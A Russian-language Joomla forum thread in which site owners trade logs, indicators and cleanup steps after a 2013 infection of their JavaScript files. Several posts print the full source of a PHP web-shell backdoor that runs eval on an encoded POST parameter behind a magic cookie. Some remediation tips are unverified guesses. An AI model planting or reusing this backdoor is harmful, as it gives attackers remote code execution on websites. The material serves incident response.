0 Пользователей и 1 Гость просматривают эту тему.
  • 356 Ответов
  • 68240 Просмотров
*

kudetolog

  • Новичок
  • 9
  • 0 / 0
Поможет т.к. данная атака ведётся из одного места с периодом 0,5 месяца. 
а если на хостинге несколько сайтов, которые заражены - как узнать, на какой идет атака? Какого-то пика по посещаемости где-то не видно. Т.е. с какого по сути сайта пришла зараза
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

playtoppokerru

  • Осваиваюсь на форуме
  • 30
  • 0 / 0
Пожалуйста, объясните точнее, кого обновлять?
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Вот какую штуку интересную только что нашел в логах.
На двух или трех сайтах в админке происходит уже почти 5 часов подбор паролей с IP 130.185.105.141 (анонимный прокси, на сколько я понял).
Более 400 штук уже попробовали.
Вот такое в логах
130.185.105.141 - - [04/May/2013:02:33:22 +0400] "GET /administrator/index.php HTTP/1.0" 200 5603 "-" "dJXHVYq UCVHAX94u S"
130.185.105.141 - - [04/May/2013:02:33:22 +0400] "POST /administrator/index.php HTTP/1.0" 200 5906 "-" "dJXHVYq UCVHAX94u S"
130.185.105.141 - - [04/May/2013:02:35:52 +0400] "GET /administrator/index.php HTTP/1.0" 200 5603 "-" "auqQCmvS3 cMl"
130.185.105.141 - - [04/May/2013:02:35:52 +0400] "POST /administrator/index.php HTTP/1.0" 200 5906 "-" "auqQCmvS3 cMl"

У меня вот еще какая мысля. Как я уже говорил, во фронтэнде запретил загрузку js , мне не надо, яндекс не ругается. Но в админке они грузятся, да и нужны они там mootools'ы всякие. Что и где прописать, чтобы для админки js грузились со стороннего сайта? Насколько я знаю, тот же mootools можно грузить с гугла.
« Последнее редактирование: 04.05.2013, 02:42:56 от RostovDriver »
*

RazarioAgro

  • Захожу иногда
  • 473
  • 4 / 0
тоже js файлы заразили, сделал бекап копию, думаете помогло?

Кто может посмотреть есть ли на сайте шелы, за помощь отблагодарю финансово, но в пределах разумного.
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Восстанавливайте бэкапы, чтобы были чистые JS файлы. Быстро запускайте утилиту fls.php http://joomlaforum.ru/index.php/topic,198048.0.html

Удаляйте, если что покажет файл. Только внимательно, лишнего не удалите.

Потом обновляйте компоненты от NoNumber Framework Joomla.

*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Изучая логи, нашел следующее.
На одном из сайтов стояла Joomla 2.5.8 или 2.5.9, обновился до 2.5.11 уже после заражения. В логах встретил /plugins/user/profile/profiles/306511.php - очевидно вирь. Завалил и, не уверен, но кажется прям после этого даже вредоносный код в js пропал. Были открыты несколько окон с вредным кодом в js, а после удаления 306511.php просто обновил окна, а вредного кода в js уже нет.
Странно все это, вроде так не должно было быть.

Может быть кому поможет найти зловреда у себя, внутри файла /plugins/user/profile/profiles/306511.php следующее:
Цитировать
<?php if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit; ?>
*

headless

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Обновляйте уже

мне, рядовому пользователю тоже не понятно чо делать то?
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок

Потом обновляйте компоненты от NoNumber Framework Joomla.


*

SashaOskol

  • Новичок
  • 4
  • 1 / 0
Так ребят у себя нашел тоже этот непонятный файл под названием 2b7b9f1219.php, лежал он у меня в папке public_html/images, если кому интересно, вот его содержание:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Теперь пробую удалить файл почистить яваскрипты и подзолотать дыры
*

kudetolog

  • Новичок
  • 9
  • 0 / 0
не знаю, можно ли похвастаться... У себя я нашел бяку через файл access_log (проверял на каждом сайте свой, искал в нём "php"). В результатах поиска смотрел, чтобы путь был не по фронт-энду, а по пути ftp. Короче, нашел пару файлов на одном лишь сайте в папке /plugins/system/jsecure/jsecure и /plugins/system/jsecure/jsecure/css/ . Файлы 4a5af7ce.php и b7bd.php. Они могут похвастаться как раз вредоносным кодом:
Спойлер
[свернуть]
*

headless

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
это 100% что эти коды с __utma и есть бяка вируса? я по прежнему думаю что это логи Google аналитик. http://otvety.google.ru/otvety/thread?tid=3dc2b45cb68a56dc&pli=1
*

kudetolog

  • Новичок
  • 9
  • 0 / 0
это 100% что эти коды с __utma и есть бяка вируса? я по прежнему думаю что это логи Google аналитик. http://otvety.google.ru/otvety/thread?tid=3dc2b45cb68a56dc&pli=1
Возможно, $_COOKIE['__utma'] и кусок кода Google... Теоретически. (хотя что Google должен оставлять на моём сайте?) А вот весь остальной код с textarea id=areatext и base64_decode(@str_replace( лично мне не оставляет сомнений в том, что это и есть тело вируса. Его, так сказать, ядро
*

BDS

  • Осваиваюсь на форуме
  • 31
  • 1 / 0
Всем привет! Принимайте и меня в свою компанию :(
Тот же Яндекс и тот же код.
Восстановил сайты (4 штуки) из копий (чистых), заблокировал IP (указанные на форуме)..........  не прошло и 5 часов и зараза опять на месте
Проверил на код
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Пусто ни одного совпадения ни на одном сайте. Я все же склоняюсь что дыра где то в движке Joomla или на хостинге
К стати сайты на NIC.ru
*

BDS

  • Осваиваюсь на форуме
  • 31
  • 1 / 0
Ссылка полезная и информация не новая
Но вот проблема в том что на сайтах я не использую NoNumber Framework и Редактор JCE
*

BDS

  • Осваиваюсь на форуме
  • 31
  • 1 / 0
Вот ещё одна мысль.
Порылся в интернете и выяснил, что заражены только русскоязычные сайты. Пока не знаю к чему, но может все же к хостингу вопросы или......
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
да не нова но все игнорируют это и чем чаше тыкать носом тем больше шансов что меньше народу пострадает, и всеж многие учатся на своих ошибках, ну ни чего с этим не поделать
вы привели код файла который заливался через JCE либо он есть на одном из сайтов либо стоял в момент заливки потом удалили и подумали что все не проверив сайт, или стоит на соседнем из сайтов, а на сервере не разграничены права, не буду холиварить но факт что именно эти файлы лили через дыру JCE

Цитировать
Вот ещё одна мысль.
Порылся в интернете и выяснил, что заражены только русскоязычные сайты. Пока не знаю к чему, но может все же к хостингу вопросы или......

потому что только русскоязычные используют эти два расширения, JCE дак вообще многие прямо в сборку пихали, а остальные тупо скачивали, nonumber вообще тупо все пользуются всеми его возможностями
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
А у кого еще стоят файловые менеджеры в админке Joomla, Akeeba ?
На хостинге nic.ru , к базам данных, всех сайтов одного акаунта, одинаковый пароль.
*

BDS

  • Осваиваюсь на форуме
  • 31
  • 1 / 0
Да, скорее оно так и было. Но мы не вспоминаем прошлое, а пытаемся устранить эту заразу. И очень хочется узнать где она сидит и что нужно сделать что бы исключить возможность нового заражения
*

BDS

  • Осваиваюсь на форуме
  • 31
  • 1 / 0
У меня следующее
-Хостинг nic.ru
-4 сайта
-Пароли к БД разные
-Joomla 1.5.26
- Akeeba стоит
- файловые менеджеры не стоят (только стандартные компоненты)
- FTP использую с админским паролем ко всем сайтам
- JCE стоял и удалил

Проверил резервные копии и выяснил что еще 19 апреля эта зараза стояла, но Яндекс молчал
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Вчера ночью удалил все файлы сайтов, кроме файлов изображений, без смены паролей. С утра уже опять был вирус. Пошел протаренным путем - удалил, сменил пароли от ftp, БД и админок сайтов, но мать его... спустя 5 мин на сайтах опять вирусняк. Что за брешь? Я вообще... ну слов нет. Как быть... И как я понимаю смена хостера не поможет.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Можешь логи хостинга выложить? Желательно под сполйер или архив
Именно за эти 5 мин
*

kudetolog

  • Новичок
  • 9
  • 0 / 0
может, кому поможет... После удаления вируса по тому же принципу поиска с логах нашел еще один файл. Короче, суть:

93.189.43.39 - - [04/May/2013:13:02:20 +0400] "POST /libraries/joomla/image/f06b84c7da.php HTTP/1.0" 200 41 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
*

KiryaBH

  • Новичок
  • 3
  • 0 / 0
может, кому поможет... После удаления вируса по тому же принципу поиска с логах нашел еще один файл. Короче, суть:

93.189.43.39 - - [04/May/2013:13:02:20 +0400] "POST /libraries/joomla/image/f06b84c7da.php HTTP/1.0" 200 41 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

+1

Каждый час идет обращение к php файлам (назания разные по типу 87328a.php), папки абсолютно разные. Обращени идет с подсети 93.189.43.**

Проблема аналогична как у всех тут. Заражены все сайты на аккаунте, точно такой же код в js файлах. Из 15 сайтов только один на Joomla, остальные на WP
*

GlooM

  • Давно я тут
  • 558
  • 91 / 0
  • AdsManager
Тоже самое, но никак не найду источник...
*

danslash

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Вчера почистил все, согласно прошлому посту. Пока никакой бяки не было.
*

maxop

  • Новичок
  • 6
  • 2 / 0
РЕШЕНИЕ ЕСТЬ!

1. Если у Вас несколько сайтов, то если хотя бы один взломан, на других JS будут с внедренным кодом. Значит первое что вы должны сделать узнать в папках какого из Ваших сайтов лежат файлы .php различного рода 87328a.php f06b84c7da.php и другие. Обнаружить их легко - по если дата изменения папки отличается от других папок, тогда заходим туда и ищем подозрительные файлы. у меня почти в каждом подразделе одного сайта  такие были. очень много в /modules

2. Далее, как только определили на каком сайте находятся эти файлы, то если у Вас есть бэкам или сайт в архиве, то удаляем текущие файлы и устанавливаем из бэкапа и архива. проверяем чтобы этих файлов там не было

3. Если бэкапа нет, тогда включаете анализатор логов на хостинге и мониторите к какому именно файлу идет обращение, поскольку одного файла достаточно, чтобы он запустил редактирование всех js файлов хостинга. и как только определите сразу удаляйте именно этот файл, а потом удаляйте все. В любом случае лучше удалить все.

А дальше делаете бэкапы тех сайтов, на которых были изменены js файлы. После этого по новой они обновляться не будут. ^-^
*

Greycat

  • Захожу иногда
  • 298
  • 64 / 0
Вот и мне письмо счастья от Яндекса прилетело!   *DRINK*

Разбор полётов:

Оказались заражены все *.js на двух сайтах одного аккаунта (хостинг nic.ru).
Антивирус Micosoft Securty Essencials на жизнь не жаловался. Свежие локальные сканеры Касперского и Sophos в резервной копии сайта ничего подозрительного не обнаружили. Между тем, Яндекс, судя по сообщениям в панели веб-мастера, заразу нашёл именно антивирусом Sophos. 

Смена всех паролей не дала ничего - файлы продолжали заражаться каждый час после очистки.
Установка прав доступа 444 на файлы тоже ничего не дала - они каким-то чудом менялись на 644.
Даты заражённых файлов при этом менялись на какие-то старые, аж 2012 года.

Код заражения в js был следующий:

Спойлер
[свернуть]


Действия:

1. Сравнением с бекапом двухмесячной давности нашёл на одном из двух сайтов большое количество php файлов с явно левыми названиями, типа "ane7hs.php". Размер у всех был почему-то немного разный (200 - 300 байт), но код внутри одинаковый:

Спойлер
[свернуть]

Бекапы сайта от 29 апреля так же оказались заражены.


2. На обоих сайтах были установлены JCE и плагин CacheCleaner от NoNuber.
CacheCleaner и NoNumber Framework убил сразу, а JCE обновил до последней версии и пока оставил. Посмотрю "на его поведение".

3. Удалил с сервера все левые php.

4. Вычистил js на локальных копиях сайта и перезалил на сервер.

В течение двух часов заражения не происходит. Надеюсь кому-то поможет.
Я.д.=41001239962471  |  WMR=R271925495206  |  WMZ=Z144922023512
*

danslash

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Об этом я и писал вчера.
Цитировать
Вроде все почистил. Пока все норм. Делал таким образом:
1) Пользуясь постоянно Хромом, удалил кеш, куки
2) Поменял пароль от хостинга (хотя думаю не в этом дело)
3) В Мозиле почистил все (кеши, куки)
4) Зашел на хостинг и скачал то что есть
5) В Тотал Коммандере искал файлы с текстом "echo '<textarea id=areatext>';" , "if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg'])))))" , "echo '</textarea>bg';" ,"/*214afaae*/" их оказалось очень много
6) Чистил данные файлы
Только плюс добавлю что чистить файлы нужно после удаления куки и кеша. А так походу куки остаются и то что вы чистите толку нету.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

Ответов: 41
Просмотров: 5642
Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ?

Автор altyn

Ответов: 72
Просмотров: 36410
Последний ответ 17.01.2019, 00:51:02
от Roki37
Делаю почту в общих настройках через smtp - в тот же день ящик взломан

Автор Mehanick

Ответов: 22
Просмотров: 1102
Последний ответ 25.05.2018, 08:11:19
от dmitry_stas
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

Ответов: 5
Просмотров: 1254
Последний ответ 01.03.2018, 22:46:10
от dragon4x4
В админке еще один администратор

Автор Lidia

Ответов: 26
Просмотров: 2042
Последний ответ 07.12.2017, 16:55:25
от Fess_N